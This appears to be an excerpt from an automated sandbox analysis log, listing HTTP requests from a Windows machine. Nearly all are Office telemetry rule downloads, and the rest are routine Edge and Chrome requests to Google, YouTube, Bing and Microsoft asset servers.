Source: global traffic HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en_GB.TFQJ3BZDjlM.es5.O/am=iB3MZPgGEBD_8DSgN6BIIGQAAAAAAAAAANAGAACAhwE/d=1/excm=_b,_tp,identifierview/ed=1/dg=0/wt=2/ujg=1/rs=AOaEmlECX2yu9w4ejXqs97RJYrHq6onanQ/m=_b,_tp HTTP/1.1Host: www.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /bloomfilterfiles/ExpandedDomainsFilterGlobal.json HTTP/1.1Host: www.bing.comConnection: keep-aliveCookie: ANON=; MUID=;_RwBf=;Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1733023421&P2=404&P3=2&P4=MOstqjPqe8Eg1pa09kOgFyzsQIDiF0edEJhwdiH6oXw7Qn52DMAEA72yi%2fgPPG133ySstQIi9qC%2fMMv4YYyhQg%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: mGcA7tkQen3O51BMaUmxWCSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1603893037&timestamp=1732418630684 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
